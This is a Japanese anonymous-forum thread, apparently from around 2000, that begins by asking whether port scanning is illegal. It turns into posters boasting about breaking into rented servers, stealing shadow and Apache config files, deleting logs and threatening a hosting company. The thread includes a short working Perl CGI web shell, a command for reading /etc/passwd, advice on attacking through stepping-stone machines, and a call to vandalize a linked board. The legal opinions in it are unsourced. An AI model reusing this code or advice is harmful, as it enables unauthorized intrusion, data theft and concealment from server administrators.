ポートスキャンは犯罪ですか？

[0001 ひろゆき＠管轄人 NG NG]

ですか？

[0002 名無しさん＠１周年 NG NG]

微妙
そこらの家の扉を鍵あいてるかどうかノブまわしてドア引っ張るようなもんだし
直接犯罪じゃなくても職務質問されてもおかしく無い感じ

[0003 名無しさん＠１周年 NG NG]

ドキュンは犯罪ですか？

[0004 ひろゆき＠管轄人 NG NG]

＞２
バイダにアカ消されたり、警告のメール届いたり、警察に・・・なんていうのは？

[0005 名無しさん＠１周年 NG NG]

＞1
て-か、やってんの？ポートスキャン

[0006 名無しさん＠１周年 NG NG]

ならんな
だから今は大丈夫

[0007 名無しさん＠１周年 NG NG]

知らなかった…
何も気にせずに会社のネットワークスキャンしてた。

[0008 名無しさん＠１周年 NG NG]

>7
監視してれば即バレだよ＞ポートスキャン

[0009 名無しさん＠１周年 NG NG]

そうそう。
監視っつーとなんか人が座ってないように思えるけど、
大抵どこでもスキャンされた結果をメール送信するようにしてるから、
あんまり派手にやると怒られるぞ。

[0010 名無しさん＠１周年 NG NG]

大学でポートスキャンしまくって怒られちゃった。てへ

[0011 名無しさん＠１周年 NG NG]

ポートスキャンは不法アクセス禁止法で処罰の対象になってるはず

[0012 名無しさん＠１周年 NG NG]

>11
だから、その根拠は？
ってこの話は前にだいぶやったはずだが。

[0013 名無しさん＠１周年 NG NG]

>ポートスキャンは不法アクセス禁止法で処罰の対象になってるはず

対象にならないって、先週の週間アスキーに載ってたよ。
ちなみにポートスキャンは、
泥棒が、家のドアや窓の鍵がかかっているかどうかをチェックするのと同様だから、
ここまでは犯罪にならない、だって。

[0014 名無しさん＠１周年 NG NG]

プロバイダ選びにポートスキャンは欠かせません

[0015 2 NG NG]

>4
まずはソーシャルでそのサーバーの管理体制調べてからいつも
スキャンするんで実際に怒られたこと無いデッス

ってか、ポートスキャン後に行うハッキングより面白いコト
思いついたんで、最近はそっちで遊んでる感じッスね

[0016 名無しさん＠１周年 NG NG]

普通にしてるよ、ポートスキャン。
サービスの検索だもん。

[0017 takemer NG NG]

不正アクセス禁止法は、あくまでも他人のIDを不法につかうという
ことに適用されるものらしいので、ポートスキャンまでなら
適用外だとおもいます。
入る前に、空いてそうな入り口を探る行為に過ぎず、実際に入ってからが
犯罪・・ということだとおもいます。

[0018 名無しさん＠１周年 NG NG]

　　　 ／∵∴∵∴＼
　　 /∵∴∵∴∵∴＼
　　/∵∴／／　　　＼｜
　 ｜∵/　　 (･)　　(･) ｜
　　(6　　　　　　 つ　　｜　　　 ／￣￣￣￣￣￣￣￣￣
　　｜　　　　＿＿＿　｜　 　＜　　ポートスキャンは冤罪だよね、とうさん。
　　　＼　　　＼＿/　／ 　　ζ ＼＿＿＿＿＿＿＿＿＿
　　　　 ＼＿＿＿_／ 　 ／￣￣￣￣ ＼
　　／⌒　　-　-　⌒＼/＼　 　／ " ＼｜
／　／|　　｡　　　｡丿 ｜　| 　　(ﾟ)　　(ﾟ) ｜
＼　＼|　　 　亠　 | (6-------◯⌒つ ｜　　 ／￣￣￣￣￣￣￣￣￣
　　＼⊇　 ／干＼|　｜　　　　＿||||||||| ｜ 　＜　さよう、カツオの言うとおりじゃ。
　　　　|　　　 　　 |　　＼　／　＼＿/ ／ 　　　＼＿＿＿＿＿＿＿＿＿
ﾊﾟﾝﾊﾟﾝ|　　　　　丶／⌒　-　- ＼
　 　　/　　ノ＼＿_| 　|＿_三_ノ|　 |
　　　/　　/ﾊﾟﾝﾊﾟﾝ| 　| 　　 　　|　 |
　　/＿_/　　　　　| 　|　　　　　 |　 |
　　　　　 　　　　⊆　|　　　　　｜　⊇

[0019 名無しさん＠１周年 NG NG]

波平に頭の横の毛がねぇぞ。↑
ちゃんとしろよ。

[0020 ひろゆき＠管轄人 NG NG]

なんだみんな普通にやってんだね。ありがと＞All
オレみたいに喋りの下手なヤツはソーシャルってムリっぽい？
スキルの無いヤツでもできますか？＞ソーシャル
ハッキングより面白いこと？　う〜ん・・W@rezくらいしか思いつかないけど。
他にスゴイことって何があるのかなぁ？
よかったら教えてください。＞２

[0021 2 NG NG]

うぇ〜
いや、ポートスキャン後に色々するんじゃなくて
ポート80をポート23の代わりに使ったりして
中いじったりしてるんですよん
つまり、スキャンして何処があいてるか確認する
必要がないな・・・っと。

しかもシェルのヒストリーを取られることも無いし、
Shadowあたりは無理だとしても(堅めのパーミッション
設定してあるから)各デーモンの設定ファイルくらいなら
結構簡単に抜けマッス。

って、色々隠しながら書いてるけど、そんなに難しい
コトじゃ無いです、はぃ。
ってかtelnet.cgi(謎)

そしてソーシャルについては、職業柄サーバー管理を
してる技術者の知り合い多いってだけです。

[0022 Virus作って配布するのは犯罪ですか？ NG NG]

わざわざスレ立てるのもなんなんで、ここで。
Virus作って配布するのは犯罪ですか？
配布って言ってもWebに「Virusです」って書いておいておくだけとか。

↓これには引っかからないと思うんだけど
不正アクセス禁止法
http://www.npa.go.jp/hightech/fusei_ac2/houann.htm

[0023 >22 NG NG]

別にいいんじゃない。＞Virus配布
誰かに送りつけなければ。

[0024 >22 NG NG]

>配布って言ってもWebに「Virusです」って書いておいておくだけとか。

たとえばコレやったとして、ビックリした受信者が警察電話して、
電話受けた警官が超無知で、コンピューターウィルスと生物兵器の
区別がつかなくて保健所に通報しちゃって、その近辺が第1級災害指定
区域(そんなものは無い)にされたあげく12時間後にN2爆雷で
消滅させられちゃった時に、罪の意識を感じないならＯＫ

[0025 ついでに NG NG]

ブラクラ貼るのは犯罪ですか？

[0026 >25 NG NG]

「ブラクラです」って書いて貼るのはいいんでないかい。
「お宝画像」って貼ったら相手によっちゃやばいかも。

[0027 名無しさん＠１周年 NG NG]

相手によってやばいのは分かるけど
犯罪にはならないでしょ？
犯罪ってのはちゃんと法律で決まってる物だけのはず
（ま〜軽犯罪とか道交法の安全運転義務違反とか
どうにでも適用可能な物のあるけどな）

[0028 ひろゆき＠管轄人 NG NG]

＞ポート80をポート23の代わりに使ったりして
凄いですね。僕、厨房なんでよくわかんないです。

＞シェルのヒストリーを取られることも無いし
　　↑これログ残らないってことですか？わかんないです。

よかったら詳しくレクチャーしてほしいのですが。

[0029 > 28 NG NG]

system( "cat /etc/passwd" );

[0030 2 NG NG]

つーかまんこデス

telnet.cgiって作ったんですよん、友人が。
んで、それをCGI可のサーバーに仕込んで
(もちろんアカウントは必要)それ使うと
ブラウザ上からテルネットできるんです
(相対パスは使えないけど)。

もし、そのサーバーがテルネット使用に
制限(他のアカウントのディレクトリは
覗かないなどの誓約書にハンコ押さなきゃ
いけないなど)を授けてる場合、誓約書に
ハンコ押したユーザーのヒストリーファイル
はチェックしても、あとは比較的無関心
だと思うんですよん(あくまで予想)。

んなもんで、アタックしたファイルにアクセス
解析仕込んで無い限りバレにくいかな・・・っと。
ってか、バレたこと無いデス。

余談ですが、上記の例のレンタルサーバーって、
1台のマシンに対して何個のサイトを詰め込んでるか
によって値段が違うんです。
20サイト限定なら幾ら、10サイト限定なら幾らって。
んで、telnet.cgiつかってアパッチの設定ファイル
盗んできたら、なんと86サイトも詰め込んでました。

えぇ、もちろん脅しましたとも。

[0031 名無しさん＠１周年 NG NG]

pingは犯罪？

[0032 ping NG NG]

隣の部署のサーバに撃ちまくったら文句言ってきた

[0033 名無しさん＠１周年 NG NG]

撃ちまくらなければ可

[0034 名無しさん＠１周年 NG NG]

print "Content-Type: text/plain\n\n";
$buffer = $ENV{'QUERY_STRING'};
$buffer =~s/=/ /g;
$telcommand=$buffer;
open(OUT＠｀"$telcommand |");
while (<OUT>){ print $_ ; }
close (OUT);

これでできるだろ。
少しPerlかじればだけでも書ける。

[0035 34 NG NG]

だけでも->誰でも

[0036 フィーネ萌えー NG NG]

>2
つか、それやってたら、
きっとhttpdのログがおもしろい事になってるよ。
80以外弾かれるんなら仕方ないけど、
そうじゃないなら適当なポートにバインドするシェルモドキｱﾌﾟするべきでしょ。
コレならログ残るのは起動時に一回だけだし。

[0037 名無しさん＠１周年 NG NG]

昔、telnetCGIでハイパーの垢消された垢とかを無理やり復活させたり
できたよね。ていうか、書くまでもない常識か・・・。すまん。

[0038 名無しさん＠１周年 NG NG]

ちなみに、ヒストリが出来る使用でも、強制的に出来ないようにすることもできりょん。

[0039 2 NG NG]

>36
ふむふむ、情報どもデス

>適当なポートにバインドするシェルモドキｱﾌﾟするべきでしょ。
そこまでできません。
うははははははははは。

もっと勉強せな・・・・・・＜オレ

[0040 2 NG NG]

>36

その後調べたら
/アカウント名/htdocs
/logs ←ココ
にhttpログがありました。
えぇ、コレなら絶対バレません。

[0041 2 NG NG]

空白が消えてる・・・

[0042 フィーネ萌えー NG NG]

>2
ん？
それは、ユーザのディレクトリにあるから
チェックしないんじゃないかってコト？
もしそうならアマイと思うよ。
マトモな管理者ならそれはやってると思う。
＃マトモじゃない管理者のほうが多いかもしれんが

と言うか、バーチャルドメイン運用してるなら
各ドメイン毎にログが分かれてるのは多分普通。

それともユーザ自身でログがいじれるってコト？
そんな環境、ちと想像つかんけど・・・。

結局なにが言いたいのかっつーと、
自分でログが消せるようになるまでは、
＃どう言う意味かはわかるよね
ログに残る行動は極力避けといたほうがイイだろ、ってコトなのよ。

まぁ、ｱﾆｵﾀﾄﾞｷｭﾝがなんか言ってるー、って感じで聞き流してくれてもＯＫ。
あたってるからね。ﾜﾗｰｲ

[0043 2 NG NG]

>42

>まぁ、ｱﾆｵﾀﾄﾞｷｭﾝがなんか言ってるー、って感じで聞き流してくれてもＯＫ。
>あたってるからね。ﾜﾗｰｲ
いや、ご忠告ありがとうございます(笑)。

>＃マトモじゃない管理者のほうが多いかもしれんが
結局コレだったみたいなんで(笑)

>それともユーザ自身でログがいじれるってコト？
>そんな環境、ちと想像つかんけど・・・。
えぇ、簡単に消せました。
うはははははははは。

>結局なにが言いたいのかっつーと、
>自分でログが消せるようになるまでは、
>＃どう言う意味かはわかるよね
>ログに残る行動は極力避けといたほうがイイだろ、ってコトなのよ。
そして後で分かったんだけど、その友人が全部
後処理しててくれたらしく。

まぁ結果おっけぇってことで。

[0044 名無しさん＠１周年 NG NG]

うひょひょ。自分でログが消せるようになるまでだってよ。
http://kigaru.gaiax.com/www/kigaru/l/i/lui_rui/bbs.html
荒らせ。

[0045 ひろゆき＠管轄人 NG NG]

とりあえずスキャンしまくりでした。しかも、手動で（爆）
ターゲットは、とりあえずキャッシュサーバー。
意味無いです（笑）練習ということで。
その後の秘密活動ですか？　ムリっす。。現在のオレには。。。
いちお、開いてたサービスポートナンバーは保存してはいますが。。
侵入はしてません。今のスキルでは９８パァ捕まりますから　('Д｀;)ゞ

えっと、質問です。（こればっかりでスイマセン）
「こんなの余裕だぜェ！！　常識だろ、ジョウ・シ・キ！！」
といった勢いが感じられる↑の会話ですが僕にはムズくてわかりませんでした。
ハックラ板に来る人にとって、当たり前の知識にしか過ぎないんですか？

[0046 2 NG NG]

2デス。
んあー・・・、言い訳するワケじゃないんですが
ボク自身は技術者の言ってる事がちゃんと理解できる
経営者を目指していたら、気がつくとついていた
知識なだけなんで、実は大したことないッス。
ってかperl書けません。何ができるのかは分かるんだけど。
ただ、覗きの好きな技術者がまわりに沢山いるんで
情報にはコト欠かない感じで。

ただ、アパッチの設定とかはやらされます、えぇ。
小さな会社なもんで・・・。

[0047 ひろゆき＠管轄人 NG NG]

２さん、うらやましいです。
僕も『覗きの大好きな技術者』目指そうと、ついさっき心に誓いました（爆）
とりあえず　ＵＮＩＸを自分マシンに載せようと企んでんですけど
ハヤリはどんなのですか？　TurboLinuxとかどうでしょか？

[0048 2 NG NG]

2ッス。

去年の秋くらいにLinuxインストールしまくってとりあえず
Turboが一番気に入ったんだけど(その他、Slack3.6・RedHat5.0・
Vine0.9?をインストール)、覗き好きの技術者さんたちはVineが
気に入ってた見たいデス(クライアントとして使うには)。

ってか、先日サーバーのセットアップをしたのですが
ディストリビューションがTurboLinux Server1.0
だったんですよん。
ありゃ死にましたね、ふはは。
今までサーバー使用(アパッチとかバインドを使う)
場合はRedHatかFree BSDばっかだったんで、全っ然ディレクトリ
構成が違うんですよ、これが、しかも超。
/var/lib/httpd
の中にアパッチ入ってるの初めてみました。
普通は
/usr/local/etc/apache
とかが多いんですけどね。

Xwindowの出来だけは良いから、クライアントとして
使うならTurboお薦めできるけど、サーバーとして
使うなら他が良いと思いマッス。
ってか、Webサーバーをメインに使うならFree BSD
の方が良いって話もチラホラ。

でも、今一番興味があるのは無料化しやがった
Solarisですね。今ならたったの$99！(送料込み)
買う買う。
とりあえずインストールして即消しな感じで。

ってかWin2000万歳！(白目)
いや、クライアントとしてはWin2000が一番良いと
思います、ハィ。

[0049 フィーネ萌えー NG NG]

>2
ふむ。
各アカウント毎に容量制限かけてるから、
ログが増えてきたら自分たちで何とかせーよってコトなのかも。
管理者的には、保守がラクで良いかもしれんが、
セキュリティポリシーとしては間違ってるよね。
あと、いい友達もったね（笑

ぼくも、デスクトップ環境はwinがいちばん良いと思う。
つか、MSってそればっかりやってきた会社なんだから、
そうそう追いつけるもんじゃないよな。
＃その辺りは、Torvaldsさんも認めてるしさ。

>44
ぉ。
スマン、なにが面白いのかわからんよ。
でも煽りは歓迎。わらい

>1
ハックラ板は基本的にバカばっかりだけど、
＃ぼく自身含む。ﾜﾗ
マジな人が見てる時もある。
目的は笑えるネタ探しだけどね。
あと、夢ふくらんでるとこに申し訳無いんだが、
ポート開いてるだけで入れるなんて考えないほうがいいよ。
ブルートなんかホントに最後の手段だからね。
それも最低限、自分的に絶対大丈夫と言い切れる踏み台アリの状態でだよ。
それで入れなかったら、その踏み台を捨てる覚悟でいかなきゃダメなんで、
よほどのコトが無い限りやらない。
外人さんはやってくる時があるけどね。しかも生で（笑


あー、マジレスｶｺﾜﾙｲよね。
自虐萌えー

[0050 名無しさん＠１周年 NG NG]

age

[0051 名無しさん＠１周年 NG NG]

8

[0052 ひろゆき＠管轄人 NG NG]

２さん、指南どうもです。
Win２ｋはそんなによいですか？＼(`Д´*)ほιぃよぉ、でもお金が・・ｼｸｼｸ（ノ_･。）
Slack・RedHat・Vine・Free BSD・Solaris・Turbo・・・。
いっぱいあるのでとりあえずタダのヤツから試食しますね（笑）
僕にとって無料はありがたいの一言に尽きますです。。（ノ_･。）
あ、目標がですね『相手に気づかれずに侵入セヨ（爆）あれれれ？』←バカぁ
に決定しましたです！！　公約を守れるようにひたすら汗しますです！！

フィーネ萌えー さん、茶っす！
ブルートで認証にチャレンジするところでした。ふぅ〜、あぶないあぶない。。。
↑コレでヤルとナニかマヅイことでも？（てーか、スキル無い時点で100％危険ですよね。汗）
あと、踏み台てナンスカ？　プロクシとかじゃないですよね？
正直わかんないです。。（ノ_･。）

＞外人さんはやってくる時があるけどね。しかも生で（笑
この後、この外人さんはどうなったんでしょか？
はっ！！　煤i￣ロ￣；）
もしかして・・・（´人｀*）チ〜ン・・・なんてことに（爆）
想像すると、リアルでコワイコワイ（笑）
実はアナタサマも管理者でいらっしゃる？

[0053 lmhosts NG NG]

WIN2Kは、そんなにいいものなんですか？
うーーん。WINDOWSには、うとい人間だからな・・・つい最近まで、
WIN95で、やっとWIN98になったばかりに・・（すでに2000は発売中）
LINUXならSlackかな〜？っていうか、Slackしか使ってないし（笑）
昔から、ずっとSlackしか使ってない（笑）
だから、RPMの管理がよくわかんないんだよね・・・・。
ちょっとは時代に乗って他のOSも勉強してみますか（笑）

[0054 フィーネ萌えー NG NG]

>1
>コレでヤルとナニかマヅイことでも
相手先のサーバのログがおもしろい事になるの。
よほどマヌケな管理者じゃない限り気付くくらい。
もちろんドコからやられてるかってのも残るから、
普通の管理者なら連絡してくるわな。
ダイアルアップからなら、プロバイダに連絡がいって、
アカウント剥奪されるかどうかってくらいかな？
よくわからん。

>踏み台てナンスカ？
文字どおり踏み台になってもらうマシンのことで、
ｱﾀｸかけるときに自分のマシンからじゃなくて、そこからやるの。
だから、プロキシってのはあながち間違いじゃないよ。

>この後、この外人さんはどうなったんでしょか？
あ、どうもなってないと思う。
ぼくはかってにモニタしてただけなんだけど、
ウザイことになったらイヤなんで、ログ消しといてあげた（笑

>lmhosts氏
あ、ぼくが普段使ってるのもwin98。
でもどうせ自分とこから直接ｱﾀｸしたりしないし、
適当な端末エミュレータ入れればそれで充分。

RPMってラクなんだけど、なんか気持ち悪いよね。
そもそも、大概のモンはmake一発なのにね。

[0055 2 NG NG]

2ッデーッス

>フィーネ萌えーさん

>セキュリティポリシーとしては間違ってるよね。
>あと、いい友達もったね（笑
うぃッス(笑)。
まぁ、その会社的には以下に管理せずに(コストをかけずに)
売り上げを伸ばすかって事が大切だってことで納得しときましょう。
いや、ホスティングの会社ってこーゆーの多いッスよ。

>あー、マジレスｶｺﾜﾙｲよね。
いや、たまにはマジレス(参考情報)無いと・・・ね？ほら・・・


>ひろゆき＠管轄人さん

>Win２ｋはそんなによいですか？＼(`Д´*)ほιぃよぉ、でもお金が・・ｼｸｼｸ（ノ_･。）
クライントOSとしては最強だと思うダス。
動くソフトの数とクライアント使用としての安定感が抜群かと。
サーバーOSとしての価値は全然分からないけど。
たぶん駄目っぽぃ(笑)。

>いっぱいあるのでとりあえずタダのヤツから試食しますね（笑）
>僕にとって無料はありがたいの一言に尽きますです。。（ノ_･。）
もしクライアントとして使うならVineが一番良いかもしれないです。
PPP接続のソフトがPPxPをデフォで使ってるのVineだけなんで。
っても、専用線接続だったりルーター使ってるなら関係無いんだけど。

>あ、目標がですね『相手に気づかれずに侵入セヨ（爆）あれれれ？』←バカぁ
いや、これが一番面白いですよ、やっぱ。
ボクの場合、Shadowファイルを盗み出すたびに星形シールを貼るんですよ、
Win2000のインストールしてあるVAIOのC1Sに。
完全に無意味な自己満足でしか無いんだけど無性に楽しいです、これ。


>lmhostsさん

>WIN2Kは、そんなにいいものなんですか？
良いッスよ。
何が良いって、市販ゲームができるのに堅いってところが(それだけ)。
LinuxだとAoKできないんで・・・。

>LINUXならSlackかな〜？っていうか、Slackしか使ってないし（笑）
>昔から、ずっとSlackしか使ってない（笑）
Slackって日本語化面倒じゃありません？
この部分で最初に挫折しました、えぇ。
あとはlibcのバージョンの問題とか・・・(Slack7はダイジョブだけど)。

>だから、RPMの管理がよくわかんないんだよね・・・・。
楽ですよ(笑)。
ただ、勉強しようと思ってる人間には余計なものでしかないけど。